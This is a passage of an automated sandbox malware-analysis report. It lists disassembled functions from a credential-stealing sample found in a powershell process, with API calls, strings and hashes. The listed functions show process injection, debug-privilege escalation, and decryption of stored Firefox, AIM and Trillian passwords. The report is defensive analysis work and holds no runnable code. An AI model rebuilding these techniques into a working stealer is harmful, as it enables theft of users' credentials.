        • VirtualAllocEx.KERNEL32(00000000,00000000,000000A0,00001000,00000004), ref: 00404AE8
        • VirtualAllocEx.KERNEL32(00000000,00000000,00000400,00001000,00000040), ref: 00404AF9
        • VirtualAllocEx.KERNEL32(00000000,00000000,0040428D,00001000,00000004), ref: 00404B0B
        • VirtualAllocEx.KERNEL32(00000000,00000000,0040428D,00001000,00000004), ref: 00404B1B
        • WriteProcessMemory.KERNEL32(00000000,00000000,?,0040428D,00000000), ref: 00404B55
        • WriteProcessMemory.KERNEL32(00000000,?,Function_00004185,00000400,00000000,00000000), ref: 00404B76
        • WriteProcessMemory.KERNEL32(00000000,0040428D,?,000000A0,00000000), ref: 00404B8C
        • ResumeThread.KERNEL32(00000000,00000000,00000000,?,0040428D,0040428D), ref: 00404BB5
        • WaitForSingleObject.KERNEL32(00000000,00003A98), ref: 00404BC1
        • CloseHandle.KERNEL32(00000000), ref: 00404BC8
        • memset.MSVCRT ref: 00404BE1
        • ReadProcessMemory.KERNEL32(00000000,0040428D,?,000000A0,00000000), ref: 00404BFE
        • ??2@YAPAXI@Z.MSVCRT ref: 00404C15
        • ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 00404C2B
        • ??3@YAXPAX@Z.MSVCRT ref: 00404C43
        • FreeLibrary.KERNEL32(?), ref: 00404C51
        • VirtualFreeEx.KERNEL32(00000000,0040428D,00000000,00008000), ref: 00404C6A
        • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C74
        • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C7E
        • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C88
        • CloseHandle.KERNEL32(00000000), ref: 00404C8D
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: AddressProcVirtual$Handle$FreeProcess$Memory$AllocClose$ModuleWritememset$LibraryReadstrlen$??2@??3@DirectoryObjectOpenResumeSingleSystemThreadVersionWait_mbscpymemcpy
        • String ID: GetModuleHandleA$GetProcAddress$LocalFree$WriteProcessMemory$kernel32.dll
        • API String ID: 826043887-859290676
        • Opcode ID: 665ad1307490be50280a61e2e255cc2a615cdf92a4a5461d0867a563b363db31
        • Instruction ID: 453227f2aabe0250eee1d40a9044243133179be0bc8eed6658bb11275d9bd618
        • Opcode Fuzzy Hash: 665ad1307490be50280a61e2e255cc2a615cdf92a4a5461d0867a563b363db31
        • Instruction Fuzzy Hash: CA81F6B1901218BBDF21ABA1CC45EEFBF79EF88754F114066F604A2160D7395A81CFA9
        Function 00407C79 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 156 407c79-407dc2 memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 157 407dc4 156->157 158 407df8-407dfb 156->158 159 407dca-407dd3 157->159 160 407e2c-407e30 158->160 161 407dfd-407e06 158->161 162 407dd5-407dd9 159->162 163 407dda-407df6 159->163 164 407e08-407e0c 161->164 165 407e0d-407e2a 161->165 162->163 163->158 163->159 164->165 165->160 165->161
        APIs
        • memset.MSVCRT ref: 00407CDB
        • memset.MSVCRT ref: 00407CEF
        • memset.MSVCRT ref: 00407D09
        • memset.MSVCRT ref: 00407D1E
        • GetComputerNameA.KERNEL32(?,?), ref: 00407D40
        • GetUserNameA.ADVAPI32(?,?), ref: 00407D54
        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
        • strlen.MSVCRT ref: 00407D91
        • strlen.MSVCRT ref: 00407DA0
        • memcpy.MSVCRT ref: 00407DB2
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
        • String ID: 5$H$O$b$i$}$}
        • API String ID: 1832431107-3760989150
        • Opcode ID: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
        • Instruction ID: c5d11ab3608301e1d6334a6842c6e335c593dc938f6648a4795a3d5a3f6caa6c
        • Opcode Fuzzy Hash: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
        • Instruction Fuzzy Hash: 0951D671C0025DFEDB11CFA4CC81AEEBBBCEF49314F0481AAE555A6181D3389B85CBA5
        Function 00410DE1 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63libraryloaderCOMMON
        Download Yara Rule

        Control-flow Graph

        APIs
        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00410DF0
          • Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00410DC0
        • GetLastError.KERNEL32(00000000), ref: 00410E02
        • GetProcAddress.KERNEL32(?,LookupPrivilegeValueA), ref: 00410E24
        • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?,?,LookupPrivilegeValueA,?,?,00000000), ref: 00410E34
        • GetProcAddress.KERNEL32(?,AdjustTokenPrivileges), ref: 00410E5A
        • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,AdjustTokenPrivileges,?,?,00000000), ref: 00410E6B
        • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00410E78
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: AddressProc$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessTokenValue
        • String ID: AdjustTokenPrivileges$LookupPrivilegeValueA$SeDebugPrivilege
        • API String ID: 3328644959-164648368
        • Opcode ID: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
        • Instruction ID: 180035a187f8386c87a779d0175683d60653c8262eee481a5a772ffe12dd7b09
        • Opcode Fuzzy Hash: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
        • Instruction Fuzzy Hash: D2117371900205FBDB11ABE5DC85AEF7BBCEB48344F10442AF501E2151DBB99DC18BA9
        Function 00404C9D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
        • LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
        • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Library$AddressFreeLoadProc
        • String ID: CryptUnprotectData$crypt32.dll
        • API String ID: 145871493-1827663648
        • Opcode ID: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
        • Instruction ID: 7870739769311804760c3d1e0253e2144152d34b250ce61cbbba51fe108a7f01
        • Opcode Fuzzy Hash: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
        • Instruction Fuzzy Hash: 01E012B06057108AE7205F76A9057837AD4AB84744F12843EA149E2580D7B8E440C798
        Function 00407898 Relevance: 6.1, APIs: 4, Instructions: 58filestringCOMMON
        Download Yara Rule
        APIs
        • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
        • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,004042EE,?), ref: 004078CC
        • strlen.MSVCRT ref: 004078FC
        • strlen.MSVCRT ref: 00407904
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: FileFindstrlen$FirstNext
        • String ID:
        • API String ID: 379999529-0
        • Opcode ID: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
        • Instruction ID: 3f72f9a190aab30f8f483bccc0fafde7a86c3084d5e1b238a9c8f95d2c3e0c3c
        • Opcode Fuzzy Hash: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
        • Instruction Fuzzy Hash: 1F1186B2919201AFD3149B34D884EDB77D8DF44325F20493FF19AD21D0EB38B9459755
        Function 0041208B Relevance: 6.1, APIs: 4, Instructions: 55COMMON
        Download Yara Rule
        APIs
        • FindResourceA.KERNEL32(?,?,?), ref: 00412098
        • SizeofResource.KERNEL32(?,00000000), ref: 004120A9
        • LoadResource.KERNEL32(?,00000000), ref: 004120B9
        • LockResource.KERNEL32(00000000), ref: 004120C4
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Resource$FindLoadLockSizeof
        • String ID:
        • API String ID: 3473537107-0
        • Opcode ID: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
        • Instruction ID: 6eee99af0fd3847aa000c15d4e464fa532876ff6069f3449b7718533803959f6
        • Opcode Fuzzy Hash: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
        • Instruction Fuzzy Hash: 0101C432600215AB8B158F95DD489DB7F6AFF8A391305C036ED09C6360D770C890C6CC
        Function 0040C66A Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 185windowCOMMON
        Download Yara Rule

        Control-flow Graph

        APIs
          • Part of subcall function 00404D7A: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
          • Part of subcall function 00404D7A: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
          • Part of subcall function 00404D7A: FreeLibrary.KERNEL32(00000000), ref: 00404DBF
          • Part of subcall function 00404D7A: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
        • FreeLibrary.KERNEL32(?), ref: 0040C6A7
        • EnumResourceTypesA.KERNEL32(00412111,00000000), ref: 0040C6C3
        • MessageBoxA.USER32(00000000,Failed to load the executable file !,Error,00000030), ref: 0040C6E5
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Library$FreeMessage$AddressEnumLoadProcResourceTypes
        • String ID: /deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MessenPass$f-@
        • API String ID: 1343656639-3807849023
        • Opcode ID: 963b88b9f9c69f281e14da51def9a8da2922e77b5a2540e53fd8c7e58f6c6b2e
        • Instruction ID: c9cf7fae9a68988a057e6d0076c0e2abe6ed6f3ff992c821ff985c928f871611
        • Opcode Fuzzy Hash: 963b88b9f9c69f281e14da51def9a8da2922e77b5a2540e53fd8c7e58f6c6b2e
        • Instruction Fuzzy Hash: 7661917190420AEBDF21AF61DD89ADE3BB8BF84305F10817BF905A21A0DB389945DF5D
        Function 00405EC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 161registryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 111 405ec5-405f21 memset * 2 call 411d68 114 406072-406083 _mbscpy 111->114 115 405f27-405f55 memset call 411dee 111->115 117 406085-40609a ExpandEnvironmentStringsA call 405e4a 114->117 118 4060b6-4060c1 114->118 121 406061-406063 115->121 125 40609c 117->125 126 40609e-4060a0 117->126 123 406069-40606c RegCloseKey 121->123 124 405f5a-405f72 _mbsnbicmp 121->124 123->114 127 405f78-405fe8 memset * 2 _snprintf call 411dae _mbsrchr 124->127 128 406049-40605e call 411dee 124->128 125->126 126->118 129 4060a2-4060ab GetCurrentDirectoryA call 405e4a 126->129 136 405fea 127->136 137 405fec-405ff2 127->137 128->121 135 4060b0-4060b2 129->135 135->118 138 4060b4 135->138 136->137 139 405ff4-406002 call 405e4a 137->139 140 406046 137->140 138->118 139->140 143 406004-40601b _mbsicmp 139->143 140->128 143->140 144 40601d-406043 _mbscpy * 2 143->144 144->140
        APIs
        • memset.MSVCRT ref: 00405EE7
        • memset.MSVCRT ref: 00405EFF
          • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
        • memset.MSVCRT ref: 00405F3A
          • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
        • _mbsnbicmp.MSVCRT ref: 00405F68
        • memset.MSVCRT ref: 00405F87
        • memset.MSVCRT ref: 00405FA0
        • _snprintf.MSVCRT ref: 00405FB9
        • _mbsrchr.MSVCRT ref: 00405FDE
        • _mbsicmp.MSVCRT ref: 00406012
        • _mbscpy.MSVCRT ref: 0040602B
        • _mbscpy.MSVCRT ref: 0040603E
        • RegCloseKey.ADVAPI32(?), ref: 0040606C
        • _mbscpy.MSVCRT ref: 0040607A
        • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memset$_mbscpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
        • String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
        • API String ID: 201549630-2797892316
        • Opcode ID: 143d9ff20e20033ed1fcd052ac8b55e33d1b5df0c5c94a0e96d74893e0675214
        • Instruction ID: a9db27f8d3bb6867008f3f8c7ab71477537d255c6bc9b4b6a3b98ebc98dd088a
        • Opcode Fuzzy Hash: 143d9ff20e20033ed1fcd052ac8b55e33d1b5df0c5c94a0e96d74893e0675214
        • Instruction Fuzzy Hash: 8F51B7B184015DBADB21DB619C86EDF7BBC9F15304F0004FAB548E2142EA789FC58BA5
        Function 00410C4C Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 93libraryloaderstringCOMMON
        Download Yara Rule

        Control-flow Graph

        APIs
        • memset.MSVCRT ref: 00410C6D
          • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
          • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
          • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
          • Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
          • Part of subcall function 00405EC5: _mbscpy.MSVCRT ref: 0040607A
          • Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
          • Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
        • SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
        • memset.MSVCRT ref: 00410CB4
        • strlen.MSVCRT ref: 00410CBE
        • strlen.MSVCRT ref: 00410CCC
        • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
        • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
        • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
        • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
        • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
        • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
        • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
          • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
          • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: AddressProc$memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
        • API String ID: 2719586705-3659000792
        • Opcode ID: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
        • Instruction ID: 3c436980af1a21df5e4856e841a29f4fe06fda5e66834ce9295461a77701cb90
        • Opcode Fuzzy Hash: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
        • Instruction Fuzzy Hash: BB317671940308AFCB20EFB5DC89ECABBB8AF64704F10486EE185D3141DAB996C48F54
        Function 004110AF Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 166 4110af-4110b6 167 411146 166->167 168 4110bc-4110cc LoadLibraryA 166->168 169 411145 168->169 170 4110ce-4110e4 GetProcAddress 168->170 169->167 171 411134-41113c 170->171 172 4110e6-4110f5 GetProcAddress 170->172 171->169 173 41113e-41113f FreeLibrary 171->173 172->171 174 4110f7-411106 GetProcAddress 172->174 173->169 174->171 175 411108-411117 GetProcAddress 174->175 175->171 176 411119-411128 GetProcAddress 175->176 176->171 177 41112a 176->177 177->171
        APIs
        • LoadLibraryA.KERNELBASE(psapi.dll,?,00411155,00404495,00000000,00000000,00000000), ref: 004110C2
        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 004110DB
        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004110EC
        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 004110FD
        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041110E
        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0041111F
        • FreeLibrary.KERNEL32(00000000), ref: 0041113F
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: AddressProc$Library$FreeLoad
        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
        • API String ID: 2449869053-232097475
        • Opcode ID: ee84c210bc0f50ddd9e1354071252ba1724dd235f625d6dd127ec76221b6c85c
        • Instruction ID: 150d9d7abe9eb73bde655d9ea944b9d4c8ac0ad9fe74c99b0592c1ab8213f4a8
        • Opcode Fuzzy Hash: ee84c210bc0f50ddd9e1354071252ba1724dd235f625d6dd127ec76221b6c85c
        • Instruction Fuzzy Hash: CA01B138941212FAC7209F26AD04BE77EE4578CB94F14803BEA04D1669EB7884828A6C
        Function 004064FB Relevance: 19.7, APIs: 10, Strings: 3, Instructions: 158stringCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 178 4064fb-40651b call 410c4c 181 406521-406555 memset call 406958 178->181 182 4066d9-4066e0 178->182 185 406563 181->185 186 406557-406561 181->186 187 406566-406568 185->187 186->187 188 4066d4 call 410d6f 187->188 189 40656e-4065d3 memset * 3 strlen * 2 187->189 188->182 191 4065d5-4065e6 call 406b4b 189->191 192 4065e8 189->192 195 4065ef-40660c strlen * 2 191->195 192->195 197 406621 195->197 198 40660e-40661f call 406b4b 195->198 200 406628-406645 strlen * 2 197->200 198->200 202 406647-406658 call 406b4b 200->202 203 40665a 200->203 204 406661-406670 call 4069d3 202->204 203->204 209 406681-406690 call 4069d3 204->209 210 406672-40667c call 4062db 204->210 214 4066a1-4066b0 call 4069d3 209->214 215 406692-40669c call 4062db 209->215 210->209 219 4066c1-4066d0 214->219 220 4066b2-4066bc call 4062db 214->220 215->214 219->188 221 4066d2 219->221 220->219 221->188
        APIs
          • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410C6D
          • Part of subcall function 00410C4C: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
          • Part of subcall function 00410C4C: SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
          • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410CB4
          • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CBE
          • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CCC
          • Part of subcall function 00410C4C: LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
          • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
          • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
          • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
          • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
          • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
          • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
        • memset.MSVCRT ref: 00406537
          • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
          • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
        • memset.MSVCRT ref: 0040657E
        • memset.MSVCRT ref: 00406596
        • memset.MSVCRT ref: 004065AE
        • strlen.MSVCRT ref: 004065B9
        • strlen.MSVCRT ref: 004065C7
        • strlen.MSVCRT ref: 004065F2
        • strlen.MSVCRT ref: 00406600
        • strlen.MSVCRT ref: 0040662B
        • strlen.MSVCRT ref: 00406639
          • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
          • Part of subcall function 004062DB: GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
          • Part of subcall function 004062DB: ??2@YAPAXI@Z.MSVCRT ref: 0040631A
          • Part of subcall function 004062DB: memset.MSVCRT ref: 00406349
          • Part of subcall function 004062DB: memset.MSVCRT ref: 00406368
          • Part of subcall function 004062DB: memset.MSVCRT ref: 0040637A
          • Part of subcall function 004062DB: strcmp.MSVCRT ref: 004063B9
          • Part of subcall function 004062DB: ??3@YAXPAX@Z.MSVCRT ref: 004064E5
          • Part of subcall function 004062DB: CloseHandle.KERNEL32(?), ref: 004064EE
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memsetstrlen$AddressProc$CurrentDirectoryFile$??2@??3@AttributesCloseHandleLibraryLoadSizememcpystrcmp
        • String ID: signons.txt$signons2.txt$signons3.txt
        • API String ID: 4081699353-561706229
        • Opcode ID: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
        • Instruction ID: 377b3a65c9dd8df244cffc1a210365992fa2ecb4602db1b88cb694f2acf2e346
        • Opcode Fuzzy Hash: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
        • Instruction Fuzzy Hash: C051C47280401CAACF11EA65DC85BCE7BACAF15319F5504BFF509F2181EB389B988B58
        Function 0040D3A0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 109stringCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 223 40d3a0-40d3ed memset call 411dae 226 40d422-40d425 223->226 227 40d3ef-40d400 call 407139 223->227 229 40d427-40d45c call 41212c call 40680e call 406958 call 4069d3 226->229 230 40d46b-40d4b9 memset call 41223f strlen * 2 226->230 227->226 234 40d402-40d415 call 4069d3 227->234 229->230 255 40d45e-40d46a _mbscpy 229->255 238 40d4d2 230->238 239 40d4bb-40d4d0 call 406b4b 230->239 234->226 246 40d417-40d421 _mbscpy 234->246 243 40d4d5-40d4de call 4069d3 238->243 239->243 252 40d4e0 243->252 253 40d4e2-40d4e6 243->253 246->226 252->253 255->230
        APIs
        • memset.MSVCRT ref: 0040D3C8
          • Part of subcall function 00411DAE: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000), ref: 00411DE3
        • _mbscpy.MSVCRT ref: 0040D41B
        • _mbscpy.MSVCRT ref: 0040D464
        • memset.MSVCRT ref: 0040D47C
        • strlen.MSVCRT ref: 0040D49D
        • strlen.MSVCRT ref: 0040D4AB
          • Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
          • Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
          • Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171
          • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: strlen$_mbscpymemset$AttributesCloseFile_memicmp
        • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian$Trillian\users\global$UninstallString$trillian$trillian.exe
        • API String ID: 2174551368-3003071570
        • Opcode ID: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
        • Instruction ID: 7bc3b858bee9d9e9ac8f81dd2a2494a9b2267e2ac629f59b21fbbbeb3bb54d2f
        • Opcode Fuzzy Hash: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
        • Instruction Fuzzy Hash: 72312B7290421469E720AA659C46BDF3B988F11715F20007FF548F71C2DEBCAAC487AD
        Function 00413E10 Relevance: 18.1, APIs: 12, Instructions: 128COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 256 413e10-413e2c call 414000 GetModuleHandleA 259 413e4d-413e50 256->259 260 413e2e-413e39 256->260 262 413e79-413ec6 __set_app_type __p__fmode __p__commode call 413ffa 259->262 260->259 261 413e3b-413e44 260->261 263 413e65-413e69 261->263 264 413e46-413e4b 261->264 271 413ed4-413f2e call 413fe8 _initterm __getmainargs _initterm 262->271 272 413ec8-413ed3 __setusermatherr 262->272 263->259 267 413e6b-413e6d 263->267 264->259 266 413e52-413e59 264->266 266->259 269 413e5b-413e63 266->269 270 413e73-413e76 267->270 269->270 270->262 275 413f30-413f38 271->275 276 413f6a-413f6d 271->276 272->271 277 413f3a-413f3c 275->277 278 413f3e-413f41 275->278 279 413f47-413f4b 276->279 280 413f6f-413f73 276->280 277->275 277->278 278->279 281 413f43-413f44 278->281 282 413f51-413f62 GetStartupInfoA 279->282 283 413f4d-413f4f 279->283 280->276 281->279 284 413f75-413f77 282->284 285 413f64-413f68 282->285 283->281 283->282 286 413f78-413f8c GetModuleHandleA call 40c66a 284->286 285->286 289 413f95-413fd5 _cexit call 414039 286->289 290 413f8e-413f8f exit 286->290 290->289
        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
        • String ID:
        • API String ID: 3662548030-0
        • Opcode ID: fd272f140936dce3ae1afac1b88f1a03475efbe3cea9d1dc08f67c2601f9b4d4
        • Instruction ID: 1a0d48d648a4d99901fb7feaec5c467672ee51f091280c2f058e756afb183587
        • Opcode Fuzzy Hash: fd272f140936dce3ae1afac1b88f1a03475efbe3cea9d1dc08f67c2601f9b4d4
        • Instruction Fuzzy Hash: 9841A071D00309DFDB209FA4D884AEE7BB4FB08715F20416BE46197291D7784AC2CB5C
        Function 0040DA79 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 198registryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
